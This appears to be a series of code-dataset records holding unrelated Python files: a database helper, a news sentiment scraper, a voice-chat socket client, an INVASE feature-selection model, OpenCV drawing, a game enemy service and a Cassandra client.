insp = inspect(self.engine)\n if not insp.has_table(tablename):\n table.__table__.create(self.engine)\n\n def reset_table(self, tablename):\n \"\"\" DANGER! this will delete all data in the table!!! \"\"\"\n\n if tablename in self.TABLE_NAMES:\n table = self.TABLE_NAMES[tablename]\n else:\n return \"Table model not found\"\n\n check = input('Are you sure? This will delete all table data (Y/N):')\n if check == 'Y':\n insp = inspect(self.engine)\n if insp.has_table(tablename):\n table.__table__.drop(self.engine)\n self.initialize_table(tablename)\n elif check == 'N':\n pass\n else:\n print('You must answer Y or N to complete this function.')\n\n def drop_table(self, tablename):\n \"\"\" DANGER! this will delete the table!!! \"\"\"\n\n if tablename in self.TABLE_NAMES:\n table = self.TABLE_NAMES[tablename]\n else:\n return \"Table model not found\"\n\n check = input('Are you sure? This will delete all table data (Y/N):')\n if check == 'Y':\n insp = inspect(self.engine)\n if insp.has_table(tablename):\n table.__table__.drop(self.engine)\n elif check == 'N':\n pass\n else:\n print('You must answer Y or N to complete this function.')\n\n def get_table(self, table_name, table_col_name=None, column_value=None):\n \"\"\"\n This function will select tables based on the table name.\n This function is a helper function used to help in\n SQLAlchemy queries.\n \"\"\"\n with self.Sessionmaker() as session:\n if column_value is not None:\n query = (select(table_name).where(\n table_col_name == column_value))\n data = session.execute(query).fetchall()\n return data\n\n else:\n query = select(table_name)\n data = session.execute(query).fetchall()\n return data\n\n\n def insert_data(self, data):\n \"\"\"\n Sets the active column for the given script_ID to False to deter the\n script from future use. Originally a \"delete_script\" function was\n conceived, but the potential need for more data on past script\n testing led to this function being employed instead.\n\n ----Labs 39 ---\n I suggest following our flow of creating helper function(s) in db.py to\n update 'bot_scripts' for the activate and deactivate functions.\n Then check endpoints in main.py to test this and set up the FE\n for connecting the modal in Admin dashboard.\n \"\"\"\n # Update 'active' to True in 'bot_script' table for 'script_id'\n with self.Sessionmaker() as session: \n session.add(data)\n session.commit()\n","sub_path":"app/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":29049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"28312197","text":"''''\nCreated on November 17, 2019\n\n@author : Svetlana Morozov\n\n'''\n\nimport sentiment_score\nimport bs4\nimport requests\nimport pandas as pd\n#from yahoo-finance import Share\nimport matplotlib.finance as fin\n\n#import quotes_historical_yahoo, candlestick,\\\n# plot_day_summary, candlestick2, fetch_historical_yahoo\n\nfrom sklearn.tree import DecisionTreeRegressor\n\n#from scikit-learn import RegressionDesicionTree\n\nimport sys\nimport urllib3\nimport html5lib\nimport html.parser\nfrom html.parser import HTMLParser\nimport re\n\n\n\n#BASE_URL = \"https://www.google.com/finance\"\n#BASE_URL = \"https://www.google.com/finance?tab=we&authuser=0\"\nBASE_URL = \"https://www.sfgate.com/bayarea\"\n\n\n#BASE_URL = \"https://www.bloomberg.com\"\ncolumns= ['title','rank','url','text']\n\n\nprint(\"BASE_URL : \",BASE_URL)\n\ndef openLink(url):\n page = requests.get(url)\n soup = bs4.BeautifulSoup(page.content, 'html.parser')\n\n return soup\n\ndef colRename(df,cols):\n for i in range(0,len(cols)):\n df.rename(columns = {i: cols[i]},inplace=True)\n\n\npage = requests.get(BASE_URL)\nsoup = bs4.BeautifulSoup(page.content, 'html.parser')\n\nmainPage = soup.findAll('a', {\"class\":\"hdn-analytics\"})\n\n\narrNewsLinks=[]\narrNews=[]\n\n#Getting links from main page\n\nprint(\"Getting links from main page ... \")\nfor item in mainPage:\n url = item.get('href')\n if \"http\" in url:\n link = url\n else:\n link = BASE_URL + url\n title = item.getText()\n if title.rstrip().lstrip() !=\"\" and len(title.split(\" \")) > 6 and url !=\"\" and url !=\"/\":\n arrNewsLinks.append([title.rstrip().lstrip(), link])\n\n\ndfNewsLinks = pd.DataFrame(arrNewsLinks).drop_duplicates()\n#dfNews.to_csv('news.csv')\n\n#Getting text for main articles\nprint(\"Getting text for main articles ... \")\nfor index, row in dfNewsLinks.iterrows():\n\n article=''\n content = openLink(row[1]).findAll('p')\n for item in content:\n article = article + ' ' + item.text\n\n\n arrNews.append([row[0],row[1],article])\n\n\n\ndfNews = pd.DataFrame(arrNews).drop_duplicates()\n\n# Read sentiment dictionary\nsent_map = sentiment_score.init_sentiment()\n\n\n# Running sentiment analysis (ranking stories)\n\nprint(\"Running sentiment analysis (ranking stories)\")\nfinalNewsList=[]\n\nfor index, row in dfNews.iterrows():\n rank = sentiment_score.sentiment_score(row[2], sent_map)\n finalNewsList.append([row[0],rank,row[1],row[2]])\n\n\n\ndfAllNews = pd.DataFrame(finalNewsList)\ndfFinalNews = dfAllNews.drop_duplicates()\n\ncolRename(dfFinalNews,columns)\ndfNegative = dfFinalNews[dfFinalNews['rank'] <0]\ndfPositive = dfFinalNews[dfFinalNews['rank'] >0]\ndfNeutral = dfFinalNews[dfFinalNews['rank'] ==0]\n\nprint (\"=\"*20)\nprint(\"Ran ranking for \"+ str(len(dfFinalNews))+ \" articles\")\nprint(\"Positive news : \", len(dfPositive))\nprint(\"Negative news : \", len(dfNegative))\nprint(\"Positive news : \", len(dfNeutral))\nprint (\"=\"*20)\n\ndfFinalNewsSorted = dfFinalNews.sort_values('rank',ascending=True)\n\nprint (\"Saving the results of ranking into a file ...\")\ndfFinalNewsSorted.to_excel('finalNews.xlsx',sheet_name='news',index=False)\n\nprint(\"finished\")\n\nprint (\"=\"*20)\n\n","sub_path":"good_news_1.0.py","file_name":"good_news_1.0.py","file_ext":"py","file_size_in_byte":3086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"150721029","text":"# encoding = utf-8\nfrom util.ObjectMap import *\nfrom util.ParseConfigurationFile import ParseConfigFile\n\nclass HomePage(object):\n def __init__(self,driver):\n self.driver = driver\n self.parseCF = ParseConfigFile()\n\n def addressLink(self):\n try:\n # 从定位表达式配置文件中读取定位通讯录按钮的定位方式和表达式\n locateType,locatorExpression = self.parseCF.getOptionValue(\\\n \"163mail_homePage\",\"homePage.addressbook\").split(\">\")\n # 获取登录成功页面通讯录页面元素,并返回给调用者\n elementObj = getElement(self.driver,locateType,locatorExpression)\n return elementObj\n except Exception as e:\n raise e\n","sub_path":"pageObjects/HomePage.py","file_name":"HomePage.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"625256258","text":"from os import error\nimport socket\nimport select\nimport sounddevice as sd\nimport pyaudio\nimport sys\nfrom threading import Thread\nimport time\nfrom contextlib import closing\nimport platform\n\nclass Client:\n def __init__(self):\n self.tcp_conn_status = False\n self.server_udp_port = None\n self.server_tcp_port = None\n self.server_address = '127.0.0.1'\n self.nick = 'Anonymous'\n\n self.guiMessage = 0\n\n self.BUFF_SIZE = 65536\n\n #audio settings\n self.CHUNK = 32\n self.FORMAT = pyaudio.paInt16\n self.CHANNELS = 1\n self.RATE = 44100\n\n self.tcp_s = None\n self.udp_s = None\n\n self.muted = False\n self.usersList = []\n self.p = pyaudio.PyAudio()\n self.refresh_audio_setup()\n\n def refresh_audio_setup(self):\n #init mic recording and sound playback\n \n sd._terminate()\n sd._initialize()\n\n inDev, outDev = self.audio_devices()\n \n try:\n inDevId = inDev[0][0]\n self.rec_stream = self.p.open(format=self.FORMAT,\n channels=self.CHANNELS,\n rate=self.RATE,\n input=True,\n frames_per_buffer=self.CHUNK,\n input_device_index=inDevId)\n except:\n pass\n\n try: \n outDevId = outDev[0][0]\n self.play_stream = self.p.open(format=self.FORMAT,\n channels=self.CHANNELS,\n rate=self.RATE,\n output=True,\n frames_per_buffer=self.CHUNK,\n output_device_index=outDevId)\n except:\n pass\n\n return inDev, outDev\n \n def in_setup(self, inDevId):\n print(inDevId)\n try:\n self.rec_stream = self.p.open(format=self.FORMAT,\n channels=self.CHANNELS,\n rate=self.RATE,\n input=True,\n frames_per_buffer=self.CHUNK,\n input_device_index=inDevId)\n except:\n pass\n \n def out_setup(self, outDevId):\n print(outDevId)\n try:\n self.play_stream = self.p.open(format=self.FORMAT,\n channels=self.CHANNELS,\n rate=self.RATE,\n output=True,\n frames_per_buffer=self.CHUNK,\n output_device_index=outDevId)\n except:\n pass\n\n def audio_devices(self):\n inputDevs = []\n outputDevs = []\n \n #Choose hostapi based on system and list devices\n if(platform.system() == 'Windows'):\n hostApi = self.p.get_host_api_info_by_type(pyaudio.paMME)\n for id in range(len(sd.query_devices())):\n dev_dict = sd.query_devices(device=id)\n if(dev_dict.get('hostapi') == hostApi.get('index')):\n if('SPDIF' not in dev_dict.get('name')): \n if(dev_dict.get('max_input_channels') > 0):\n inputDevs.append((id, dev_dict.get('name')))\n elif(dev_dict.get('max_output_channels') > 0):\n outputDevs.append((id, dev_dict.get('name')))\n else:\n for id in range(len(sd.query_devices())):\n dev_dict = sd.query_devices(device=id)\n if('SPDIF' not in dev_dict.get('name')): \n if(dev_dict.get('max_input_channels') > 0):\n inputDevs.append((id, dev_dict.get('name')))\n elif(dev_dict.get('max_output_channels') > 0):\n outputDevs.append((id, dev_dict.get('name')))\n\n #Move default to first element in list\n\n try:\n defaultInputDev = sd.default.device[0]\n for i in range(len(inputDevs)):\n if(inputDevs[i][0] == defaultInputDev):\n inputDevs.insert(0, inputDevs.pop(i))\n except:\n self.guiMessage = 2\n\n try:\n defaultOutputDev = sd.default.device[1]\n for i in range(len(outputDevs)):\n if(outputDevs[i][0] == defaultOutputDev):\n outputDevs.insert(0, outputDevs.pop(i))\n except:\n self.guiMessage = 3\n\n return inputDevs, outputDevs\n\n def sockets_setup(self):\n self.tcp_s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.udp_s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n self.udp_s.setsockopt(socket.SOL_SOCKET,socket.SO_RCVBUF,self.BUFF_SIZE)\n self.udp_s.bind(('', 0))\n self.udp_s.settimeout(0.2)\n self.tcp_s.settimeout(1)\n\n def set_nick(self, nick):\n self.nick = nick\n\n def set_server_addr(self, ip):\n self.server_address = ip\n\n def set_server_tcp_port(self, port):\n self.server_tcp_port = port\n\n def tcpConnection(self):\n data = 'JOIN ' + self.nick + ' ' + str(self.udp_s.getsockname()[1])\n self.tcp_s.send(bytes(data, 'UTF-8'))\n data = self.tcp_s.recv(1024)\n decoded = data.decode('UTF-8')\n message = decoded.split()\n if (message[0] == \"OK\" and len(message[1]) > 0):\n self.tcp_conn_status = True\n self.server_udp_port = int(message[1])\n #Start voice voice streaming\n Thread(target=self.udpRecv).start()\n Thread(target=self.udpSend).start()\n else:\n self.tcp_s.shutdown(socket.SHUT_RDWR)\n self.tcp_s.close()\n\n while(self.tcp_conn_status == True):\n #check if everything is ok\n try:\n ready_to_read, ready_to_write, in_error = \\\n select.select([self.tcp_s,], [self.tcp_s,], [], 5)\n \n if len(ready_to_read) > 0:\n recv = self.tcp_s.recv(1024)\n decoded = recv.decode('UTF-8')\n message = decoded.split()\n if (message[0] == \"LIST\"):\n users = []\n for i in range(1, len(message)):\n users.append(message[i])\n self.usersList = users\n\n if len(ready_to_write) > 0:\n self.tcp_s.send(bytes('AWLI', 'UTF-8'))\n\n time.sleep(1)\n\n except:\n if(self.tcp_conn_status == True):\n try:\n self.tcp_s.shutdown(socket.SHUT_RDWR)\n self.tcp_s.close()\n self.tcp_conn_status = False\n self.guiMessage = 1\n except:\n self.tcp_s.close()\n self.tcp_conn_status = False\n self.guiMessage = 1\n break\n\n def disconnect(self):\n try:\n self.tcp_s.send(bytes(\"LEAV\", 'UTF-8'))\n recv = self.tcp_s.recv(1024)\n decoded = recv.decode('UTF-8')\n if(decoded == 'BYE'):\n self.tcp_s.shutdown(socket.SHUT_RDWR)\n self.tcp_s.close()\n self.tcp_conn_status = False\n except:\n self.tcp_s.close()\n self.tcp_conn_status = False\n print(\"disconnected\")\n\n\n def udpSend(self):\n while True:\n if (self.tcp_conn_status == True): \n try:\n if(self.muted == False):\n data = self.rec_stream.read(self.CHUNK, exception_on_overflow=False)\n else:\n data = b''\n self.udp_s.sendto(data, (self.server_address, self.server_udp_port))\n except:\n pass\n else:\n break\n \n def udpRecv(self):\n while True:\n if (self.tcp_conn_status == True):\n try:\n data, addr = self.udp_s.recvfrom(2048)\n self.play_stream.write(data)\n except:\n pass\n else:\n break\n\n def Start(self, nick, server_addr, server_tcp_port):\n self.sockets_setup()\n self.set_nick(nick)\n self.set_server_addr(server_addr)\n self.set_server_tcp_port(server_tcp_port)\n self.muted = False\n self.usersList = []\n print('connecting')\n self.tcp_s.connect((self.server_address, self.server_tcp_port))\n print('connected')\n Thread(target=self.tcpConnection).start()\n\n def mute(self):\n if(self.muted == False):\n self.muted = True\n else:\n self.muted = False\n \n return self.muted\n\nif (__name__ == \"__main__\"):\n client = Client()\n client.Start('Tester', '127.0.0.1', 5001)","sub_path":"client/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":9026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"264135625","text":"'''\nWritten by Jinsung Yoon\nDate: Jan 1th 2019\nINVASE: Instance-wise Variable Selection using Neural Networks Implementation on Synthetic Datasets\nReference: J. Yoon, J. Jordon, M. van der Schaar, \"IINVASE: Instance-wise Variable Selection using Neural Networks,\" International Conference on Learning Representations (ICLR), 2019.\nPaper Link: https://openreview.net/forum?id=BJg_roAcK7\nContact: jsyoon0823@g.ucla.edu\n\n---------------------------------------------------\n\nInstance-wise Variable Selection (INVASE) - with baseline networks\n'''\n\n#%% Necessary packages\n# 1. Keras\nfrom keras.layers import Input, Dense, Multiply\nfrom keras.layers import BatchNormalization\nfrom keras.models import Sequential, Model\nfrom keras.models import Sequential, Model, load_model\nfrom keras.optimizers import Adam\nfrom keras import regularizers\nfrom keras import backend as K\n\n# 2. Others\nimport tensorflow as tf\nimport numpy as np\nfrom sklearn.metrics import roc_auc_score, average_precision_score, accuracy_score\n\n#%% Define PVS class\nclass PVS():\n \n # 1. Initialization\n '''\n x_train: training samples\n data_type: Syn1 to Syn 6\n '''\n def __init__(self, x_train):\n self.latent_dim1 = 100 # Dimension of actor (generator) network\n self.latent_dim2 = 200 # Dimension of critic (discriminator) network\n def __init__(self, x_train, load_model=False):\n \n self.batch_size = 100 # Batch size\n self.epochs = 20000 # Epoch size (large epoch is needed due to the policy gradient framework)\n self.lamda = 0.1 # Hyper-parameter for the number of selected features\n\n self.input_shape = x_train.shape[1] # Input dimension\n self.output_size = 4\n\n # Actionvation.\n self.activation = 'selu'\n\n # Use Adam optimizer with learning rate = 0.0001\n optimizer = Adam(0.00001)\n \n if load_model:\n self.load_models()\n else:\n # Build and compile the discriminator (critic)\n self.discriminator = self.build_discriminator()\n # Use categorical cross entropy as the loss\n self.discriminator.compile(loss='categorical_crossentropy', optimizer=optimizer, metrics=['acc'])\n\n # Build the generator (actor)\n self.generator = self.build_generator()\n # Use custom loss (my loss)\n self.generator.compile(loss=self.my_loss, optimizer=optimizer)\n\n # Build and compile the value function\n self.valfunction = self.build_valfunction()\n # Use categorical cross entropy as the loss\n self.valfunction.compile(loss='categorical_crossentropy', optimizer=optimizer, metrics=['acc'])\n\n #%% Custom loss definition\n def my_loss(self, y_true, y_pred):\n \n # dimension of the features\n d = y_pred.shape[1] \n\n # Put all three in y_true \n # 1. selected probability\n sel_prob = y_true[:,:d]\n # 2. discriminator output\n dis_prob = y_true[:,d:(d + self.output_size)]\n # 3. valfunction output\n val_prob = y_true[:, (d + self.output_size):(d + 2 * self.output_size)]\n # 4. ground truth\n y_final = y_true[:, (d + 2 * self.output_size):]\n\n # A1. Compute the rewards of the actor network\n Reward1 = tf.reduce_sum(y_final * tf.log(dis_prob + 1e-8), axis = 1) \n \n # A2. Compute the rewards of the actor network\n Reward2 = tf.reduce_sum(y_final * tf.log(val_prob + 1e-8), axis = 1) \n\n # Difference is the rewards\n Reward = Reward1 - Reward2\n\n # B. Policy gradient loss computation. \n loss1 = Reward * tf.reduce_sum( sel_prob * K.log(y_pred + 1e-8) + (1-sel_prob) * K.log(1-y_pred + 1e-8), axis = 1) - self.lamda * tf.reduce_mean(y_pred, axis = 1)\n \n # C. Maximize the loss1\n loss = tf.reduce_mean(-loss1)\n\n return loss\n\n #%% Generator (Actor)\n def build_generator(self):\n\n model = Sequential()\n \n model.add(Dense(100, activation=self.activation, name = 's/dense1', kernel_regularizer=regularizers.l2(1e-3), input_dim = self.input_shape))\n model.add(Dense(self.input_shape, activation = 'sigmoid', name = 's/dense2', kernel_regularizer=regularizers.l2(1e-3)))\n \n model.summary()\n\n feature = Input(shape=(self.input_shape,), dtype='float32')\n select_prob = model(feature)\n\n return Model(feature, select_prob)\n\n #%% Discriminator (Critic)\n def build_discriminator(self):\n\n model = Sequential()\n \n model.add(Dense(200, activation=self.activation, name = 'dense1', kernel_regularizer=regularizers.l2(1e-3), input_dim = self.input_shape)) \n model.add(BatchNormalization()) # Use Batch norm for preventing overfitting\n model.add(Dense(self.output_size, activation ='softmax', name ='dense2', kernel_regularizer=regularizers.l2(1e-3)))\n \n model.summary()\n \n # There are two inputs to be used in the discriminator\n # 1. Features\n feature = Input(shape=(self.input_shape,), dtype='float32')\n # 2. Selected Features\n select = Input(shape=(self.input_shape,), dtype='float32') \n \n # Element-wise multiplication\n model_input = Multiply()([feature, select])\n prob = model(model_input)\n\n return Model([feature, select], prob)\n \n #%% Value Function\n def build_valfunction(self):\n\n model = Sequential()\n \n model.add(Dense(200, activation=self.activation, name = 'v/dense1', kernel_regularizer=regularizers.l2(1e-3), input_dim = self.input_shape)) \n model.add(BatchNormalization()) # Use Batch norm for preventing overfitting\n model.add(Dense(self.output_size, activation ='softmax', name = 'v/dense2', kernel_regularizer=regularizers.l2(1e-3)))\n \n model.summary()\n \n # There are one inputs to be used in the value function\n # 1. Features\n feature = Input(shape=(self.input_shape,), dtype='float32') \n \n # Element-wise multiplication\n prob = model(feature)\n\n return Model(feature, prob)\n\n #%% Sampling the features based on the output of the generator\n def Sample_M(self, gen_prob):\n \n # Shape of the selection probability\n n = gen_prob.shape[0]\n d = gen_prob.shape[1]\n \n # Sampling\n samples = np.random.binomial(1, gen_prob, (n,d))\n \n return samples\n\n #%% Training procedure\n def train(self, x_train, y_train):\n\n # For each epoch (actually iterations)\n for epoch in range(self.epochs):\n\n #%% Train Discriminator\n # Select a random batch of samples\n idx = np.random.randint(0, x_train.shape[0], self.batch_size)\n x_batch = x_train[idx,:]\n y_batch = y_train[idx,:]\n\n # Generate a batch of probabilities of feature selection\n gen_prob = self.generator.predict(x_batch)\n \n # Sampling the features based on the generated probability\n sel_prob = self.Sample_M(gen_prob) \n \n # Compute the prediction of the critic based on the sampled features (used for generator training)\n dis_prob = self.discriminator.predict([x_batch, sel_prob])\n\n # Train the discriminator\n d_loss = self.discriminator.train_on_batch([x_batch, sel_prob], y_batch)\n\n #%% Train Valud function\n\n # Compute the prediction of the critic based on the sampled features (used for generator training)\n val_prob = self.valfunction.predict(x_batch)\n\n # Train the discriminator\n v_loss = self.valfunction.train_on_batch(x_batch, y_batch)\n \n #%% Train Generator\n # Use three things as the y_true: sel_prob, dis_prob, and ground truth (y_batch)\n y_batch_final = np.concatenate( (sel_prob, np.asarray(dis_prob), np.asarray(val_prob), y_batch), axis = 1 )\n\n # Train the generator\n g_loss = self.generator.train_on_batch(x_batch, y_batch_final)\n\n #%% Plot the progress\n dialog = 'Epoch: ' + str(epoch) + ', d_loss (Acc): ' + str(d_loss[1]) + ', v_loss (Acc): ' + str(v_loss[1]) + ', g_loss: ' + str(np.round(g_loss,4))\n\n if epoch % 100 == 0:\n print(dialog)\n \n #%% Selected Features \n def output(self, x_train):\n \n gen_prob = self.generator.predict(x_train)\n \n return np.asarray(gen_prob)\n \n #%% Prediction Results \n def get_prediction(self, x_train, m_train):\n \n val_prediction = self.valfunction.predict(x_train)\n \n dis_prediction = self.discriminator.predict([x_train, m_train])\n \n return np.asarray(val_prediction), np.asarray(dis_prediction)\n\n def save_models(self):\n self.generator.save('./model/generator.h5')\n self.valfunction.save('./model/valfunction.h5')\n self.discriminator.save('./model/discriminator.h5')\n\n def load_models(self):\n self.generator = load_model('./model/generator.h5', custom_objects={'my_loss': self.my_loss})\n self.valfunction = load_model('./model/valfunction.h5')\n self.discriminator = load_model('./model/discriminator.h5')\n\n\n#%% Main Function\nif __name__ == '__main__':\n \n # Data generation function import\n from Data_Reader import read_data\n\n x_train, y_train, x_test, y_test = read_data(source=\"./data/pathway_activity.csv\")\n\n #%% \n # 1. PVS Class call\n PVS_Alg = PVS(x_train, load_model=True)\n \n # 2. Algorithm training\n PVS_Alg.train(x_train, y_train)\n \n # 3. Get the selection probability on the testing set\n Sel_Prob_Test = PVS_Alg.output(x_test)\n \n # 4. Selected features\n score = 1.*(Sel_Prob_Test > 0.5)\n num_sel_features = score.sum() / len(score)\n print(\"Number of Selected Features:\", num_sel_features)\n\n # np.savetxt(\"testset_selected_feature.csv\", score, delimiter=',')\n PVS_Alg.save_models()\n\n # 5. Prediction\n val_predict, dis_predict = PVS_Alg.get_prediction(x_test, score)\n\n val_accuracy_table = [[0 for _ in range(PVS_Alg.output_size)] for _ in range(PVS_Alg.output_size)]\n dis_accuracy_table = [[0 for _ in range(PVS_Alg.output_size)] for _ in range(PVS_Alg.output_size)]\n\n val_label = np.argmax(val_predict, axis=1)\n dis_label = np.argmax(val_predict, axis=1)\n true_label = np.argmax(y_test, axis=1)\n\n for i in range(len(true_label)):\n val_accuracy_table[val_label[i]][true_label[i]] += 1\n dis_accuracy_table[dis_label[i]][true_label[i]] += 1\n\n # Compute weighted F1 score\n from sklearn.metrics import f1_score\n val_f1_score = f1_score(true_label, val_label, average='weighted')\n dis_f1_score = f1_score(true_label, dis_label, average='weighted')\n\n # Compute Accuracy\n val_correct = 0\n dis_correct = 0\n\n for i in range(PVS_Alg.output_size):\n val_correct += val_accuracy_table[i][i]\n dis_correct += dis_accuracy_table[i][i]\n\n val_accuracy = val_correct / len(val_label)\n dis_accuracy = dis_correct / len(dis_label)\n\n # Print Accuracy Table\n print(\"\\nBaseline Prediction\")\n for i in range(len(val_accuracy_table)):\n for j in range(len(val_accuracy_table[i])):\n print(val_accuracy_table[i][j], end=' ')\n print()\n print(\"Weighted F1 Score: {:.4f}\".format(val_f1_score))\n print(\"Accuracy: {:.4f}\".format(val_accuracy))\n\n print(\"\\nPredictor Prediction\")\n for i in range(len(dis_accuracy_table)):\n for j in range(len(dis_accuracy_table[i])):\n print(dis_accuracy_table[i][j], end=' ')\n print()\n print(\"Weighted F1 Score: {:.4f}\".format(dis_f1_score))\n print(\"Accuracy: {:.4f}\".format(dis_accuracy))\n","sub_path":"INVASE.py","file_name":"INVASE.py","file_ext":"py","file_size_in_byte":11956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"650237301","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov 4 15:10:29 2019\n\n@author: mfba\n\"\"\"\n\nimport pandas as pd\nimport os\n\n\ndef remove_small_genes(annotations, min_gene_size):\n\n genes_to_remove = []\n\n # Iterate over rows\n for index, row in annotations.iterrows():\n\n # Find gene length\n gene_length = row[\"end\"] - row[\"start\"]\n\n # Check if smaller than minimum length\n if gene_length < min_gene_size:\n genes_to_remove.append(index)\n\n # Remove all genes smaller than minimum\n annotations = annotations.drop(annotations.index[genes_to_remove])\n return annotations.reset_index(drop=True)\n\n\ndef remove_big_genes(annotations, max_gene_size):\n\n genes_to_remove = []\n\n # Iterate over rows\n for index, row in annotations.iterrows():\n\n # Find gene length\n gene_length = row[\"end\"] - row[\"start\"]\n\n # Check if smaller than minimum length\n if gene_length >= max_gene_size:\n genes_to_remove.append(index)\n\n # Remove all genes smaller than minimum\n annotations = annotations.drop(annotations.index[genes_to_remove])\n return annotations.reset_index(drop=True)\n\n\nif __name__ == \"__main__\":\n # Local path of git directory\n os.chdir(\"D:/DTU/02456 - Deep Learning/final_project/drastic/data\")\n\n # Remember to change to local path\n filepath = \"GCA_000008865.2_ASM886v2_feature_table.tsv\"\n\n # Save gene meta data in Panda frame\n annotations = pd.read_csv(filepath, sep=\"\\t\")\n\n # Minimum gene size. All genes less than this will be removed.\n min_gene_size = 200\n\n # Retrieve valid genes\n ann = remove_small_genes(annotations, min_gene_size)\n\n print(\"End of script.\")\n","sub_path":"src/pre-processing/remove_small_genes.py","file_name":"remove_small_genes.py","file_ext":"py","file_size_in_byte":1684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"252764061","text":"import cv2\nimport numpy as np\n\n# cap = cv2.VideoCapture('image/mission.jpg')\ncap = cv2.VideoCapture(1, cv2.CAP_DSHOW)\nwhile True:\n ret, frame = cap.read()\n width = int(cap.get(3)) # 3 for width from document\n height = int(cap.get(4)) # 4 for height from document\n\n img = cv2.line(frame, (0, 0), (width, height), (0, 255, 0), 5)\n img = cv2.line(img, (0, height), (width, 0), (0, 255, 0), 20)\n img = cv2.rectangle(img, (250, 50), (500, 300), (56, 23, 160), 10)\n img = cv2.circle(img, (50, 50), 50, (0, 0, 255), -1)\n font = cv2.FONT_HERSHEY_COMPLEX\n img = cv2.putText(img, \"tatti\", (10, height - 100),\n font, 1, (0, 0, 0), 3, cv2.LINE_AA)\n\n cv2.imshow('frame', img)\n\n if cv2.waitKey(1) == ord('q'):\n break\n\ncap.release()\ncv2.destroyAllWindows()\n","sub_path":"drawlines.py","file_name":"drawlines.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"449926187","text":"from typing import List, Optional\n\nfrom server.lib.model.models import EnemyModel, EnemyAbilityModel, UserModel\nfrom server.lib.repository import enemy_repository, repository\n\n\ndef get_enemies(user: UserModel):\n return enemy_repository.get_enemies(user.id)\n\n\ndef create_enemy(name, max_hp, ac, stre, dex, con, inte, wis, cha, user):\n enemies = get_enemies(user)\n for enemy in enemies:\n if enemy.name == name:\n return \"You have already used this enemy name.\"\n\n enemy = EnemyModel.from_name_hp_ac(name, max_hp, ac, user.id)\n\n enemy.strength = stre\n enemy.dexterity = dex\n enemy.constitution = con\n enemy.intelligence = inte\n enemy.wisdom = wis\n enemy.charisma = cha\n\n enemy_repository.create_enemy(enemy)\n return \"\"\n\n\ndef delete_enemy(enemy_id: int, user: UserModel):\n enemy = get_enemy(enemy_id)\n if not enemy:\n return \"This enemy does not exist\"\n\n if enemy.user != user:\n return \"This enemy does not belong to this user\"\n\n enemy_repository.delete_enemy(enemy)\n return \"\"\n\n\ndef get_enemy(enemy_id: int):\n return enemy_repository.get_enemy(enemy_id)\n\n\ndef add_ability(enemy_id: int, text: str, user: UserModel):\n enemy = get_enemy(enemy_id)\n\n if enemy is None:\n return \"This enemy does not exist.\"\n\n if enemy.user != user:\n return \"This enemy does not belong to this user.\"\n\n ability = EnemyAbilityModel.from_id_text(enemy.id, text)\n enemy_repository.add_ability(ability)\n return \"\"\n\n\ndef get_abilities(eid: int, user: UserModel) -> List[EnemyAbilityModel]:\n enemy = get_enemy(eid)\n\n if enemy.user != user:\n return []\n\n return enemy_repository.get_enemy_abilities(enemy)\n\n\ndef delete_ability(ability_id: int, enemy_id: int, user: UserModel):\n enemy = get_enemy(enemy_id)\n if not enemy:\n return \"This enemy does not exist\"\n\n if enemy.user != user:\n return \"This enemy does not belong to this user\"\n\n ability = enemy_repository.get_ability(ability_id)\n\n # This should never happen when the front end works correctly.\n if ability.enemy != enemy:\n return \"This ability does not belong to this enemy\"\n\n enemy_repository.delete_ability(ability)\n return \"\"\n\n\ndef edit_ability(ability_id, text, user):\n ability = enemy_repository.get_ability(ability_id)\n if ability.enemy.user != user:\n return \"The ability you are trying to edit does not belong to an enemy created by you.\"\n\n ability.text = text\n repository.add_and_commit(ability)\n\n return \"\"\n","sub_path":"server/lib/service/enemy_service.py","file_name":"enemy_service.py","file_ext":"py","file_size_in_byte":2536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"632212030","text":"from cassandra.cluster import Cluster\n\nimport logging\nimport time\n\nlog = logging.getLogger()\nlog.setLevel('INFO')\n\nclass SimpleClient(object):\n\tsession = None\n\tdef connect(self, nodes):\n\t\tcluster = Cluster(nodes)\n\t\tmetadata = cluster.metadata\n\t\tself.session = cluster.connect()\n\t\tlog.info('Connected to cluster: ' + metadata.cluster_name)\n\t\tfor host in metadata.all_hosts():\n\t\t\tlog.info('Datacenter: %s; Host: %s; Rack: %s',\n\t\t\t\thost.datacenter, host.address, host.rack)\n\tdef close(self):\n\t\tself.session.cluster.shutdown()\n\t\tlog.info('Connection closed.')\n\tdef create_schema(self):\n\t\tself.session.execute(\"\"\"CREATE KEYSPACE Kolumbus WITH replication =\n {'class':'SimpleStrategy', 'replication_factor':3};\"\"\")\n\t\tself.session.execute(\"\"\"\n\t\t\tCREATE TABLE Kolumbus.VM (\n\t\t\t\tid uuid PRIMARY KEY,\n\t\t\t\tRecordedAtTime text,\n\t\t\t\tValidUntilTime text,\n\t\t\t\tLinkDistance text,\n\t\t\t\tPercentage text,\n\t\t\t\tLineRef text,\n\t\t\t\tDirectionRef text,\n\t\t\t\tVehicleMode text,\n\t\t\t\tPublishedLineName text,\n\t\t\t\tOriginRef text,\n\t\t\t\tOriginName text,\n\t\t\t\tDestinationRef text,\n\t\t\t\tDestinationName text,\n\t\t\t\tOriginAimedDepartureTime text,\n\t\t\t\tDestinationAimedArrivalTime text,\n\t\t\t\tMonitored text,\n\t\t\t\tLatitude text,\n\t\t\t\tLongitude text,\n\t\t\t\tDelay text,\n\t\t\t\tCourseOfJourneyRef 